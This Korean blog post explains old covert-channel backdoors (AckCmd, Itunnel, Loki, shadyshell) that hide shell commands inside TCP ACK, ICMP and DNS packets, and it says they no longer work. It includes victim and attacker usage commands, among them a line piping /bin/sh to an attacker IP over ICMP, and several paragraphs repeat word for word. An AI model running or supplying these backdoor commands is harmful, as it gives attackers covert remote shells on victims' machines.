아래 공격들은 지금은 통하지 않는 공격들이며 원리만 알아둡시다.
AckCmd
shadyshell.c
AckCmd
:TCP 기반의 백도어 프로그램으로 서버(희생자) 클라이언트(공격자) 모델로서 ,TCP flag의 [UAPRSF] 비트중 A 를 1로 셋팅하고 데이터영역이 있는 패킷을 생성하여 보낸다.
공격자는 데이터영역에 쉘 상에서 수행가능한 명령어를 포함할 수 있다. (클라이언트프로그램이 프롬프트제공)
일반적으로 데이터 영역이 붙어있게되면 TCP에서는 push와 ack를 셋팅하도록 되어있지만, ack flag만 셋팅되어있는 tcp패킷에서 data를 붙이는것을 금지해 놓지는 않았다.
이를 이용한 것이다.
초창기에는 단순 ACK 패킷을 보냄으로써, 방화벽에 탐지되지 않았으나 이공격은 2000 이하에서나 동작하지 서비스팩 2부터는 동작하지 않는다. 한마디로 옛날 공격이고 원리만 알아두자.
서버(희생자) 에서
# ./ackcmds
클라이언트(공격자) 에서
# ./ackcmdc 희생자IP
공격자는 데이터영역에 쉘 상에서 수행가능한 명령어를 포함할 수 있다. (클라이언트프로그램이 프롬프트제공)
일반적으로 데이터 영역이 붙어있게되면 TCP에서는 push와 ack를 셋팅하도록 되어있지만, ack flag만 셋팅되어있는 tcp패킷에서 data를 붙이는것을 금지해 놓지는 않았다.
이를 이용한 것이다.
초창기에는 단순 ACK 패킷을 보냄으로써, 방화벽에 탐지되지 않았으나 이공격은 2000 이하에서나 동작하지 서비스팩 2부터는 동작하지 않는다. 한마디로 옛날 공격이고 원리만 알아두자.
서버(희생자) 에서
# ./ackcmds
클라이언트(공격자) 에서
# ./ackcmdc 희생자IP
Itunnel
: ICMP기반의 백도어 프로그램으로 서버 클라이언트 모델로서 ICMP의 추가되는 data 영역에 쉘 상에서 수행할 수 있는 명령어를 추가할 수 있다.
서버( 희생자) 상에서는
# ./it localhost | /bin/sh | ./it attackerIP
클라이언트(공격자) 상에서는
# ./it victimIP
itunnel-1_2.tar.gz
서버( 희생자) 상에서는
# ./it localhost | /bin/sh | ./it attackerIP
클라이언트(공격자) 상에서는
# ./it victimIP

Loki(1997)
: ICMP기반의 백도어 프로그램으로 서버 클라이언트 모델로서 ICMP의 추가되는 data 영역에 쉘 상에서 수행할 수 있는 명령어를 추가할 수 있다.
2010년에 스위치와 라우터 공격용으로 개발된 Loki와는 완전히 다르므로 구별하자
2010년에 스위치와 라우터 공격용으로 개발된 Loki와는 완전히 다르므로 구별하자
shadyshell
: UDP기반의 백도어 프로그램으로서 DNS 패킷 안에 쉘 상에서 수행할 수 있는 명령어를 삽입할 수 있다.
서버(희생자)에서는
./shadyshell
클라이언트(공격자)에서는
nc -u 희생자IP 53
서버(희생자)에서는
./shadyshell
클라이언트(공격자)에서는
nc -u 희생자IP 53

'보안 > Network' 카테고리의 다른 글
프록시 (0) | 2011.08.23 |
---|---|
Hping 을 이용한 SynFlooding 공격 (0) | 2011.07.18 |
SynFlooding 방어 (0) | 2011.07.18 |
스위치 보안정리 2 (0) | 2011.07.13 |
스위치 보안정리 1 (0) | 2011.07.13 |